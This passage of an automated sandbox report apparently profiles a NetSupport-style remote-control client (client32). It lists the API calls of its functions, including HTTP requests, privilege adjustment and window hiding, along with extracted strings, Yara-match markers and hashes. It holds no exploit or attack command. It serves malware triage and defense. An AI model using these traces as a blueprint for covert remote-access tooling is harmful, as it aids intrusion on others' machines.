                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                              • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                              • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                              • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                              • HttpOpenRequestA.WININET(?,GET,1119A6D8,00000000,00000000,00000000,8040F000,00000000), ref: 11029EEF
                                                                              • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                              • InternetQueryDataAvailable.WININET(1117FC4B,1102CCC1,00000000,00000000), ref: 1102A09E
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                              • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$AvailableConnectDataHeapHttpLoadQueryRequest
                                                                              • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                              • API String ID: 579908884-913974648
                                                                              APIs
                                                                                • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                              • _fgets.LIBCMT ref: 110628E2
                                                                              • _strpbrk.LIBCMT ref: 11062949
                                                                              • _fgets.LIBCMT ref: 11062A4C
                                                                              • _strpbrk.LIBCMT ref: 11062AC3
                                                                              • __wcstoui64.LIBCMT ref: 11062ADC
                                                                              • _fgets.LIBCMT ref: 11062B55
                                                                              • _strpbrk.LIBCMT ref: 11062B7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                              • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start

                                                                              Control-flow Graph (first block 11139ed0-11139f05; graph data omitted)
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                              • IsWindow.USER32(00040270), ref: 11139F65
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139F73
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139FAB
                                                                              • GetForegroundWindow.USER32 ref: 11139FC6
                                                                              • EnableWindow.USER32(00040270,00000000), ref: 11139FE0
                                                                              • EnableWindow.USER32(00040270,00000001), ref: 11139FFC
                                                                              • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                              • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                              • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                              • IsWindowVisible.USER32(00040270), ref: 1113A088
                                                                              • IsIconic.USER32(00040270), ref: 1113A095
                                                                              • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040270,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040270,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                              • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                              • EnableWindow.USER32(00040270,00000001), ref: 1113A0D4
                                                                              • GetLastError.KERNEL32 ref: 1113A193
                                                                              • GetLastError.KERNEL32 ref: 1113A20B
                                                                              • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                              • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                              • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                              • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin

                                                                              Control-flow Graph (first block 11134830-1113486c; graph data omitted)
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,AB86ACF8), ref: 1113489E
                                                                              • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                              • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                              • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                              • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                              • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                              • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                              • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                              • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                              • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                              • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                              • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                              • _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              • _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                              • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                              • API String ID: 3299820421-2117887902
                                                                              • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                              • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                              • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                              • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                              • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                              • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                              • CoUninitialize.OLE32(00000000), ref: 111169E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                              • String ID: SHELL32.DLL$SHGetSettings
                                                                              • API String ID: 4195908086-2348320231
                                                                              • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                              • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                              • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                              • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: NBCTL32.DLL$_License$serial_no
                                                                              • API String ID: 2102423945-35127696
                                                                              • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                              • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                              • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                              • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID: Client32$NSMWClass$NSMWClass
                                                                              • API String ID: 3192549508-611217420
                                                                              • Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                              • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                              • Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                              • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                              APIs
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,01611D68,01611D68,01611D68,01611D68,01611D68,01611D68,01611D68,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                              • EqualSid.ADVAPI32(?,01611D68,?,00000001,00000001), ref: 1109EDC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InformationToken$AllocateEqualInitialize
                                                                              • String ID:
                                                                              • API String ID: 1878589025-0
                                                                              • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                              • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                              • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                              • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,AB86ACF8,00080000,00000000,?), ref: 1109D88D
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                              • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                              • String ID:
                                                                              • API String ID: 2349140579-0
                                                                              • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                              • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                              • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                              • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                              APIs
                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                              • FindCloseChangeNotification.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: AdjustChangeCloseFindNotificationPrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 1022747518-0
                                                                              • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                              • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                              • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                              • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                              • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                              • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                              • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                              • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                              • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                              • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                              • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                              • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                              • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                              • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                              • DispatchMessageA.USER32(?), ref: 11030136
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                              • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                              • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                              • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                              • SetWindowPos.USER32(00040270,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                              • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • wsprintfA.USER32 ref: 11030645
                                                                                • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,AB86ACF8,?,?,00000000), ref: 1112909A
                                                                                • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                              • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$562258$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                              • API String ID: 372548862-1112890062
                                                                              • Opcode ID: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                              • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                              • Opcode Fuzzy Hash: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                              • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

                                                                              Control-flow Graph: first block 1048 at 1102e0d0-1102e120 (legend: Executed / Not Executed)
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memsetwsprintf
                                                                              • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$562258$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                              • API String ID: 3802068140-1818846399
                                                                              • Opcode ID: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                              • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                              • Opcode Fuzzy Hash: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                              • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

                                                                              Control-flow Graph: first block 1690 at 11144140-11144181 (legend: Executed / Not Executed)
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 11144173
                                                                              • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                              • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                              • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                              • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                              • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                              • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                              • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                              • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                              • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                              • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                              • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                              • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                              • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                              • API String ID: 3874234733-2061581830
                                                                              • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                              • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
